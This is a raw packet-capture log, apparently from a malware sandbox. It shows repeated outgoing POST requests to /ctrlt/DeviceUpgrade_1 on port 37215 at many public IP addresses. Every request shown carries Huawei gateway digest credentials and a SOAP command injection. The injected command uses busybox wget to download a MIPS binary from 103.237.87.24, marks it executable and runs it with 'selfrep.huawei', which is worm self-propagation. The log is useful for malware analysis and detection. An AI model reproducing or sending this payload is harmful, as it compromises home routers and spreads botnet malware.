6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  859192.168.2.134239441.117.250.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.375132084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  860192.168.2.1350130197.14.35.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377204895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  861192.168.2.1347130141.43.145.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377232075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  862192.168.2.1343956157.24.14.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377295017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  863192.168.2.1359156157.184.58.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377326012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  864192.168.2.1350372197.22.229.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377327919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  865192.168.2.135371441.61.24.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377438068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  866192.168.2.1333680197.234.124.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377439022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  867192.168.2.1359818197.165.117.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377449989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  868192.168.2.1355048189.43.94.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377454042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  869192.168.2.1349614197.60.189.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.377466917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
